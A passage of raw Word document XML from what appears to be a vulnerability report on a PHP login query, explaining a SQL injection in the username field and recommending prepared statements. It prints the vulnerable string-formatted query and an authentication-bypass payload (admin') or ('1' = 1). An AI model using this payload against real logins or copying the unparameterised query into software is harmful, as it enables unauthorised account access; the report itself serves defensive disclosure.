                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EC5F66"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">AND </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="A6ACB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74CCA003" w14:textId="2CFC7E5F" w:rsidR="00832F07" w:rsidRPr="00832F07" w:rsidRDefault="00832F07" w:rsidP="00832F0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832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">query </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="6699CC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>create_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="6699CC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>sqlQuery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="A6ACB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="6699CC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>array</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">pwdmd5, </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="A6ACB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23F256D3" w14:textId="77777777" w:rsidR="00832F07" w:rsidRPr="002355AE" w:rsidRDefault="00832F07" w:rsidP="000F6F1C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">At a close inspection is it possible to the that the password field is not vulnerable to a SQL injection, since it is first hashed into MD5 and then put into the query. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1664BB99" w14:textId="77777777" w:rsidR="00832F07" w:rsidRPr="002355AE" w:rsidRDefault="00832F07" w:rsidP="000F6F1C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">When looking at the </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> field it is possible to see that it gets input as is into the query.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E25AB7" w14:textId="6E594D8C" w:rsidR="00832F07" w:rsidRPr="002355AE" w:rsidRDefault="00832F07" w:rsidP="000F6F1C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">With the provided PoC found above, the new query looks as following (yellow is the user-controlled input): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271402A6" w14:textId="1BE8BDA1" w:rsidR="00832F07" w:rsidRPr="00832F07" w:rsidRDefault="00832F07" w:rsidP="00832F0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ACB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EC5F66"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(‘</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="FFC000" w:themeColor="accent4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>&lt;hash&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>’)</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">AND </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(‘</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="FFC000" w:themeColor="accent4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>admin’) or (‘1’ = 1</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>’)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0E4EB3" w14:textId="77777777" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DF7C412" w14:textId="008C260D" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To fix the issue the following can be done:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9C7267" w14:textId="74C40D88" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Use prepared statements with bound variables. They are provided by PDO, by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MySQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and by other libraries.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6523CB26" w14:textId="06BE30B9" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If the database layer doesn't support binding variables then quote each non numeric user supplied value that is passed to the database with the database-specific string escape function</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (in this case this would </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">be </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
